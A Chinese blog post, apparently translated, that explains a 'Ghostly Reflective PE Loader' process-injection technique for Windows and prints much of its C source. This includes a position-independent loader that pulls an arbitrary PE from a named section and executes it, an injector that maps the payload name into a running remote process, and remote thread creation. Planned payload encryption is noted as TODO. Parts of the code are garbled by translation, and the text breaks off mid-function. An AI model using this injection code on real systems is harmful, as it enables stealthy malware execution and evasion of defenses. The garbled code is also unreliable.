Ghostly Reflective PE Loader — 如何让现有的远程进程在其自身中注入 PE

于 2025-03-19 12:00:29 发布
阅读量415 收藏 9
点赞数 5
文章标签: 网络安全情报
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sinat_35360663/article/details/146365759
版权

来源:马可波罗(电视剧)

我正在研究反射 DLL 注入,这是一项将加载器 DLL 注入到远程进程的技术,然后该进程自行加载(因此称为“反射”),并运行其 DllMain 入口点。

我想知道我是否可以注入一个不可知的加载器,它不会自行加载,而是加载任何 PE。如果不是直接将此 PE 映射到远程进程,而是加载器本身获取它,会怎么样?这样,我可以重用本地 PE 加载器,将其变成远程 PE 加载器。

这个想法

先决条件

我的想法利用了我之前写过的一些概念。我强烈建议你仔细阅读这些概念,因为我们将把这两个概念结合起来:

此外,您还需要了解一些 Windows 内部知识:

鬼魂空心——优点和缺点

Ghostly Hollowing 只能将 PE 注入新创建的挂起进程。它无法注入已在运行的进程并保持其原始线程继续运行。它依赖于在进程有机会解析导入之前修补映像基址。这样,除了使加载器正确解析注入的 PE 的导入函数外,它还消除了重定位的需要(由于修补了基址)。此外,由于映像是用 映射的SEC_IMAGE,因此所有 PE 部分都正确分配了页面保护。

简而言之,Ghostly Hollowing 可以在进程内映射功能齐全、随时可调用的 PE。但它无法处理已在运行的进程的重定位。

反射型 DLL 注入——优点和缺点

反射式 DLL 注入涉及将加载器 DLL 注入远程进程。此加载器 DLL 导出一个位置无关的函数,该函数加载 DLL 本身(解析导入、重定位、分配正确的内存权限等)。由于它与位置无关,因此在实际加载 DLL 之前它不会失败。此后,DllMain将调用 DLL 的入口点。

此外,由于加载器 DLL 会自行加载,因此可以避免加载时过多的进程间读写。DLL 加载器可以本地加载自身,不是吗?

简而言之,反射 DLL 注入可以加载远程进程中的任何 DLL,但前提是 DLL 导出可以自行加载的位置无关函数。

结合两者 — 幽灵反射 PE 注射

我们可以结合上述两种技术来弥补彼此的缺点。思路是这样的——我们将反射 DLL 注入的加载器 DLL 分为三个部分——注入器加载器和实际目标 PE(我们实际上打算加载的那个)。

  1. 使用 Ghostly Hollowing,注入器会在远程进程中注入一个位置无关的加载器DLL,并执行它。无需重定位。所有必要的函数都在运行时解析。由于 Ghostly Hollowing 的工作方式,这个映射的 DLL 将显示在一个空白图像名称下。
  2. 反射 DLL 将自身(整个有效负载已可用)加载为目标 PE。受此启发,我编写了加载器,直接从系统页面文件读取目标 PE (您可以让它从任何来源读取)。

加载器和目标 PE 现已解耦!加载器现在可以本地加载所需的任何 PE。

概述步骤

点击放大

  1. 使用 Ghostly Hollowing,将Loader DLL映射到远程进程中。
  2. 在远程进程中创建一个新线程来调用Loader DLL导出的加载函数(与位置无关)。我将其命名为Load()
  3. 该加载函数从系统页面文件中获取目标PE 。
  4. 然后在本地加载并执行获取的目标 PE 。

编写加载器 DLL

要求

让我们从 Loader DLL 开始。以下是要求:

  1. 必须是与位置无关的代码:所有必要的函数都必须在运行时解析。由于 Loader 可以注入任何进程,因此它必须仅依赖ntdll.dllkernel32.dll(谨慎地)。所有其他功能都必须自定义实现。此外,不能使用全局变量,因为全局变量是通过其偏移量引用的,而我们还没有重定位。
  2. 必须从系统页面文件中获取目标 PE:使用 NT API,可以打开一个命名的部分并从中读取目标 PE 内容。
  3. 必须在本地加载目标 PE:现在目标 PE 内容已提取到内存中,必须加载它并执行其入口点。我将重用我之前的本地 PE 加载器代码。

代码

<span style="background-color:#f9f9f9"><span style="color:#242424"><span style="color:#007400">/* 
---------------------------------------------------------------------------------------------------
此函数与位置无关,并将传递的 DLL 内容加载为 DLL 

sectionName:从中获取 DLL 内容的 Section 的 UTF16-LE 名称
*/ </span>
<span style="color:#aa0d91">extern </span> <span style="color:#c41a16">"C"</span> __declspec(dllexport) <span style="color:#5c2699">void </span> <span style="color:#1c00cf">Load </span><span style="color:#5c2699">(LPVOID sectionName)</span>  { 
 <span style="color:#007400">// 初始化变量</span>
LPVOID pDllContents = <span style="color:#aa0d91">NULL</span> ; 
SIZE_T dllContentsSize = <span style="color:#1c00cf">0</span> ; 
DWORD ntStatus = <span style="color:#1c00cf">0</span> ; 
HMODULE hNtdll = <span style="color:#aa0d91">NULL</span> ; 
LPVOID pDllImage = <span style="color:#aa0d91">NULL</span> ; 
DWORD entrypointOffset = <span style="color:#1c00cf">0</span> ; 

 <span style="color:#007400">// 解析必要的函数</span>
WINFUNC winFunc; 
 <span style="color:#aa0d91">if</span> (! <span style="color:#5c2699">ResolveNecessaryFunctions</span> (&winFunc, &hNtdll)) <span style="color:#aa0d91">return</span> ; 

 <span style="color:#007400">// 从 Section 读取 DLL </span>

 <span style="color:#007400"> 打开部分句柄</span>
HANDLE hSectionDll = <span style="color:#aa0d91">NULL</span> ; 
OBJECT_ATTRIBUTES dllSectionObjectAttributes{}; 
 <span style="color:#5c2699">RtlZeroMemoryCustom</span> (&dllSectionObjectAttributes, <span style="color:#5c2699">sizeof</span> (OBJECT_ATTRIBUTES)); 

UNICODE_STRING sectionNameUnicodeString{}; 
DWORD sectionNameLen = <span style="color:#5c2699">StringLenW</span> ((PWCHAR)sectionName); 

sectionNameUnicodeString.Buffer = (PWSTR)sectionName; 
sectionNameUnicodeString.MaximumLength = sectionNameLen * <span style="color:#5c2699">sizeof</span> (WCHAR); 
sectionNameUnicodeString.Length = sectionNameLen * <span style="color:#5c2699">sizeof</span> (WCHAR); 

 <span style="color:#5c2699">InitializeObjectAttributes</span> ( 
  &dllSectionObjectAttributes, 
  §ionNameUnicodeString, 
  OBJ_CASE_INSENSITIVE, 
  <span style="color:#aa0d91">NULL</span> , 
  <span style="color:#aa0d91">NULL</span>
 ); 

ntStatus = winFunc.pNtOpenSection <span style="color:#5c2699">(</span> & 
  hSectionDll, 
  SECTION_MAP_READ | SECTION_MAP_WRITE, 
  &dllSectionObjectAttributes 
);
 <span style="color:#aa0d91">如果</span>(hSectionDll == <span style="color:#aa0d91">NULL</span> )<span style="color:#aa0d91">转到</span>CLEANUP; 

 <span style="color:#007400"> 将部分视图映射到本地进程</span>
ntStatus = winFunc。<span style="color:#5c2699">pNtMapViewOfSection</span> ( 
  hSectionDll, 
  (HANDLE) <span style="color:#1c00cf">-1</span> , 
  &pDllContents, 
  <span style="color:#aa0d91">NULL</span> , 
  <span style="color:#aa0d91">NULL</span> , 
  <span style="color:#aa0d91">NULL</span> , 
  &dllContentsSize, 
  SECTION_INHERIT::ViewUnmap, 
  <span style="color:#aa0d91">NULL</span> , 
  PAGE_READWRITE 
);
 <span style="color:#aa0d91">如果</span>(dllContentsSize == <span style="color:#1c00cf">0</span>|| pDllContents == <span style="color:#aa0d91">NULL</span> ) <span style="color:#aa0d91">goto</span> CLEANUP; 

 <span style="color:#007400">// 解密 DLL 并恢复签名 TODO </span>

 <span style="color:#007400">// 加载 DLL </span>
 <span style="color:#5c2699">LoadDll</span> (&winFunc, hNtdll, pDllContents, &pDllImage, &entrypointOffset); 
 <span style="color:#aa0d91">if</span> (pDllImage == <span style="color:#aa0d91">NULL</span> ) <span style="color:#aa0d91">goto</span> CLEANUP; 

 <span style="color:#007400">// 删除原始 DLL 内容</span>
 <span style="color:#aa0d91">if</span> (pDllContents != <span style="color:#aa0d91">NULL</span> ) 
  winFunc. <span style="color:#5c2699">pNtUnmapViewOfSection</span> ( 
   (HANDLE) <span style="color:#1c00cf">-1</span> , 
   pDllContents 
  ); 
 <span style="color:#aa0d91">if</span> (hSectionDll != <span style="color:#aa0d91">NULL</span> ) 
  winFunc. <span style="color:#5c2699">pNtClose</span> (hSectionDll); 

 <span style="color:#007400">// 跳转到 DLL 的入口点</span>
 <span style="color:#5c2699">JumpToEntry</span> (&winFunc, entrypointOffset, pDllImage); 

 <span style="color:#007400">// 清理</span>
CLEANUP: 
 <span style="color:#007400">// 清理内存中的 DLL 缓冲区</span>
 <span style="color:#aa0d91">if</span> (pDllImage != <span style="color:#aa0d91">NULL</span> ) 
  winFunc. <span style="color:#5c2699">pNtFreeVirtualMemory</span> ( 
   (HANDLE) <span style="color:#1c00cf">-1</span> , 
   &pDllImage, 
   <span style="color:#1c00cf">0</span> , 
   MEM_RELEASE 
  ); 

 <span style="color:#007400">//退出当前线程</span>
winFunc. <span style="color:#5c2699">pNtTerminateThread</span> ((HANDLE) <span style="color:#aa0d91">NULL</span> , (NTSTATUS) <span style="color:#1c00cf">0</span> ); 
}</span></span>

上面是 Loader DLL 的导出Load(LPVOID sectionName)函数,它接受一个节名,并从中读取目标 PE 内容。

和与我的本地 PE 加载器相同。有了目标 PE 内容,您现在可以解析它、加载它并跳转到其计算出的入口点LoadDll()JumpToEntry()

需要NtTerminateThread手动调用。如果不这样做,return将会期望将 RIP 推送到堆栈上,但我们不会这样做,因为我们将直接跳转到Load

我们还必须记住进行清理——关闭所有打开的句柄、取消所有映射视图的映射等。

编写注入器

到这一步,我们的 Loader 已经准备好了,注入器需要把它注入到远程进程中,然后Load(LPVOID sectionName)用 fastcall “调用” 它的导出函数。

为目标 PE 创建命名部分

<span style="background-color:#f9f9f9"><span style="color:#242424"><span style="color:#007400">/* 
-------------------------------------------------------------------------------------------------------
为目标 PE 创建命名部分的函数
*/ </span>
<span style="color:#5c2699">void </span> <span style="color:#1c00cf">CreateNamedSectionForTargetPE </span><span style="color:#5c2699">( <span style="color:#5c2699">bool</span> injectionLocal, IN PWINFUNC pWinFunc, IN LPVOID pDllContents, IN DWORD dllContentsSize, IN PHANDLE phFileMapping, IN OUT PWCHAR targetPESectionName, IN HANDLE hTargetProcess)</span>  { 
 <span style="color:#007400">// 初始化</span>
 <span style="color:#5c2699">bool</span> isSuccess = <span style="color:#aa0d91">false</span> ; 
LPVOID pDllContentsLocalMapped = <span style="color:#aa0d91">NULL</span> ; 
ULONG objectNameLen = <span style="color:#1c00cf">0</span> ; 
POBJECT_NAME_INFORMATION pObjectNameInfo = <span style="color:#aa0d91">NULL</span> ; 

 <span style="color:#007400">// 创建由系统页面内存支持的部分</span>
SECURITY_ATTRIBUTES fileMappingSecurityAttr{}; 
fileMappingSecurityAttr.bInheritHandle = TRUE; 
fileMappingSecurityAttr.nLength = <span style="color:#5c2699">sizeof</span> (SECURITY_ATTRIBUTES); 
*phFileMapping = <span style="color:#5c2699">CreateFileMappingW</span> ( 
  INVALID_HANDLE_VALUE, 
  &fileMappingSecurityAttr, 
  PAGE_READWRITE, 
  <span style="color:#1c00cf">0</span> , 
  dllContentsSize, 
  targetPESectionName 
);
 <span style="color:#aa0d91">如果</span>(*phFileMapping == <span style="color:#aa0d91">NULL</span> ) <span style="color:#aa0d91">goto</span> CLEANUP; 

 <span style="color:#007400">// 将节名更新为完全限定的</span>
pWinFunc-> <span style="color:#5c2699">pNTQueryObject</span> ( <span style="color:#007400">// 第一次会失败,因为 objectNameLen 为 0</span>
   *phFileMapping, 
  (OBJECT_INFORMATION_CLASS)OBJECT_NAME_INFORMATION_CLASS, 
  pObjectNameInfo, 
  <span style="color:#1c00cf">0</span> , 
  &objectNameLen 
);
 <span style="color:#aa0d91">如果</span>(objectNameLen != <span style="color:#1c00cf">0</span> ) { 
  pObjectNameInfo = (POBJECT_NAME_INFORMATION)( <span style="color:#5c2699">HeapAlloc</span> ( 
   <span style="color:#5c2699">GetProcessHeap</span> (), 
   HEAP_ZERO_MEMORY, 
   objectNameLen 
  ));
  <span style="color:#aa0d91">如果</span>(pObjectNameInfo != <span style="color:#aa0d91">NULL</span> ) { 
   pWinFunc-> <span style="color:#5c2699">pNTQueryObject</span> ( 
    *phFileMapping, 
    (OBJECT_INFORMATION_CLASS)OBJECT_NAME_INFORMATION_CLASS, 
    pObjectNameInfo, 
    objectNameLen, 
    &objectNameLen 
   );

   <span style="color:#aa0d91">如果</span>(pObjectNameInfo->Name.Buffer != <span style="color:#aa0d91">NULL</span> ) { 
    <span style="color:#5c2699">CopyBuffer</span> ((PBYTE)targetPESectionName, (PBYTE)(pObjectNameInfo->Name.Buffer), (pObjectNameInfo->Name.MaximumLength)); 
   } 
  } 
} 
 <span style="color:#5c2699">wprintf</span> ( <span style="color:#c41a16">L"为目标 DLL 创建的命名部分:\"%s\"\n"</span> , targetPESectionName);

 <span style="color:#007400">// 将部分映射到当前进程,并将目标 PE 内容写入其中</span>
pDllContentsLocalMapped = <span style="color:#5c2699">MapViewOfFile</span> ( 
  *phFileMapping, 
  FILE_MAP_READ | FILE_MAP_WRITE, 
  <span style="color:#1c00cf">0</span> , 
  <span style="color:#1c00cf">0</span> , 
  <span style="color:#1c00cf">0</span>
 );
 <span style="color:#aa0d91">如果</span>(pDllContentsLocalMapped == <span style="color:#aa0d91">NULL</span> ) <span style="color:#aa0d91">goto</span> CLEANUP; 
 <span style="color:#5c2699">CopyBuffer</span> ((PBYTE)pDllContentsLocalMapped, (PBYTE)pDllContents, dllContentsSize); <span style="color:#007400">// TODO 加密 DLL 内容</span>
 <span style="color:#5c2699">printf</span> ( <span style="color:#c41a16">"%d 字节目标 DLL 有效负载写入命名部分 (本地映射 0x%p)\n"</span> , dllContentsSize, pDllContentsLocalMapped); 

 <span style="color:#007400">// 清理</span>
CLEANUP:
 <span style="color:#aa0d91">如果</span>(pDllContentsLocalMapped != <span style="color:#aa0d91">NULL</span> ) 
  <span style="color:#5c2699">UnmapViewOfFile</span> (pDllContentsLocalMapped);

 <span style="color:#aa0d91">如果</span>(pObjectNameInfo != <span style="color:#aa0d91">NULL</span> ) 
  <span style="color:#5c2699">HeapFree</span> ( <span style="color:#5c2699">GetProcessHeap</span> (), <span style="color:#1c00cf">0</span> , pObjectNameInfo); 
}</span></span>

命名部分可以是会话特定的,也可以是全局的,具体取决于名称中使用的前缀。即便如此,实际部分名称最终也会以更多内容作为前缀。获取完全限定的部分名称至关重要,因为与 Win32 API 不同,NT API 只接受全名。NtQueryObject()有助于检索此全名。

CreateFileMappingW()创建命名部分,并将MapViewOfFile其映射到本地进程。然后它将原始目标 PE 内容写入此视图,从而有效地为 Loader 准备命名部分。

在远程进程中为 Loader DLL 创建 Ghost 部分

这与 Ghostly Hollowing 技术完全相同,因此我不会在这里再次展示它。这样,Loader DLL 就会加载到远程进程中,并具有所有正确的页面保护。

在远程进程中为目标 PE 注入节名称

加载器 DLL 的Load(LPVOID sectionName)函数需要用于获取目标 PE 的节名的地址。必须先将此名称写入远程进程中的任意地址,然后必须存储该地址以传递给Load(LPVOID sectionName)函数。

<span style="background-color:#f9f9f9"><span style="color:#242424"><span style="color:#007400">/*
-------------------------------------------------------------------------------------------------------
Function to map the name of the named section (containg target PE payload) to Target process
*/
<span style="color:#242424"><span style="background-color:#f9f9f9"><span style="color:#5c2699">bool</span> <span style="color:#1c00cf">InjectSectionNameForTargetPEContentsInTargetProcess</span><span style="color:#5c2699">(<span style="color:#5c2699">bool</span> injectLocal, IN HANDLE hTargetProcess, IN PWCHAR targetPESectionName, OUT PHANDLE phDllContentsSectionNameMappingTarget, OUT VOID **ppDllContentsSectionNameTarget)</span> </span></span><span style="color:#242424"><span style="background-color:#f9f9f9">{</span></span>
 <span style="color:#007400"><span style="background-color:#f9f9f9">// Create file mapping object</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> DWORD targetPESectionNameSize = (</span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">StringLenW</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(targetPESectionName) + </span></span><span style="color:#1c00cf"><span style="background-color:#f9f9f9">1</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) * </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">sizeof</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(WCHAR);</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> *phDllContentsSectionNameMappingTarget = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">CreateFileMappingW</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  INVALID_HANDLE_VALUE,</span></span>
  <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  PAGE_READWRITE | SEC_COMMIT,</span></span>
  <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  targetPESectionNameSize,</span></span>
  <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> );</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (*phDllContentsSectionNameMappingTarget == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span> <span style="color:#aa0d91"><span style="background-color:#f9f9f9">false</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Map view to local process and write the section name</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> LPVOID targetPESectionNameLocal = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">MapViewOfFile</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  *phDllContentsSectionNameMappingTarget,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  FILE_MAP_WRITE,</span></span>
  <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
  <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
  <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> );</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (targetPESectionNameLocal == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span> <span style="color:#aa0d91"><span style="background-color:#f9f9f9">false</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">CopyBuffer</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">((PBYTE)targetPESectionNameLocal, (PBYTE)targetPESectionName, targetPESectionNameSize);</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">//Map section to target process</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (injectLocal)</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  *ppDllContentsSectionNameTarget = targetPESectionNameLocal;</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">else</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  *ppDllContentsSectionNameTarget = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">MapViewOfFile3</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   *phDllContentsSectionNameMappingTarget,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   hTargetProcess,</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   PAGE_READWRITE,</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  );</span></span>

 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (*ppDllContentsSectionNameTarget == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span> <span style="color:#aa0d91"><span style="background-color:#f9f9f9">false</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"DLL contents section name mapped to target 0x%p\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, *ppDllContentsSectionNameTarget);</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span> <span style="color:#aa0d91"><span style="background-color:#f9f9f9">true</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">}</span></span></span></span></span>

Load()在 Loader 中调用

由于Load(LPVOID sectionName)采用 fastcall,因此需要进行额外的修补以确保新线程可以正确调用它。这是因为线程入口点是用 stdcall 调用的。stdcall 会在堆栈上传递参数,但 fastcall 需要它在寄存器中。由于sectionName是第一个参数,因此Load()需要它在 RCX 寄存器中。换句话说,RCX 必须保存节名称的地址。我们创建一个新的挂起线程,并设置其线程上下文以设置此 RCX 值。

除此之外,RIP 还被修补为存储Load()的地址。这是因为新线程不会直接从其入口点开始执行;在此之前有一些初始化代码。

<span style="background-color:#f9f9f9"><span style="color:#242424"><span style="color:#007400">/*
-------------------------------------------------------------------------------------------------------
Invokes loader DLL
*/
<span style="color:#242424"><span style="background-color:#f9f9f9"><span style="color:#5c2699">bool</span> <span style="color:#1c00cf">InvokeLoaderDll</span><span style="color:#5c2699">(<span style="color:#5c2699">bool</span> injectLocal, IN PWINFUNC pWinFunc, IN PWCHAR targetPESectionNameAddress, IN HANDLE hTargetProcess, IN DWORD targetProcessId, IN LPVOID pLoaderDllContents, IN VOID** ppDllLoaderInTargetBaseAddress)</span> </span></span><span style="color:#242424"><span style="background-color:#f9f9f9">{</span></span>
 <span style="color:#007400"><span style="background-color:#f9f9f9">// Initialisation</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> ULONG processAllSize = </span></span><span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> PSYSTEM_PROCESS_INFORMATION pProcessAll = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> PSYSTEM_PROCESS_INFORMATION pTargetProcessInfo = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> PSYSTEM_THREAD_INFORMATION pTargetThreadInfo = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> HANDLE hTargetThread = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> PIMAGE_NT_HEADERS pNtHeader = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> LPVOID dllLoaderInTargetAddressOfLoadFunction = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">bool</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> isSuccess = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">false</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Find DLL loader's Load function offset</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> dllLoaderInTargetAddressOfLoadFunction = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">ADD_OFFSET_TO_POINTER</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(*ppDllLoaderInTargetBaseAddress, </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">GetProcAddressOffset</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(pLoaderDllContents, (PCHAR)</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Load"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">));</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (dllLoaderInTargetAddressOfLoadFunction == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span> <span style="color:#aa0d91"><span style="background-color:#f9f9f9">false</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">/*
 Execute Loader DLL's Load() function
 
 For injecting locally, create new local thread
 For injecting remotely, hijack remote process's worker thread
 */</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (injectLocal) {</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  DWORD threadId = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  hTargetThread = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">CreateThread</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   (LPTHREAD_START_ROUTINE)dllLoaderInTargetAddressOfLoadFunction,</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   CREATE_SUSPENDED,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   &threadId</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  );</span></span>
  <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (hTargetThread == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>
  <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Local thread %d created for Target DLL execution, start address: 0x%p\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, threadId, dllLoaderInTargetAddressOfLoadFunction);</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> }</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">else</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> {</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  DWORD threadId = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  hTargetThread = </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">CreateRemoteThread</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   hTargetProcess,</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
   <span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   (LPTHREAD_START_ROUTINE)dllLoaderInTargetAddressOfLoadFunction,</span></span>
   <span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">,</span></span>
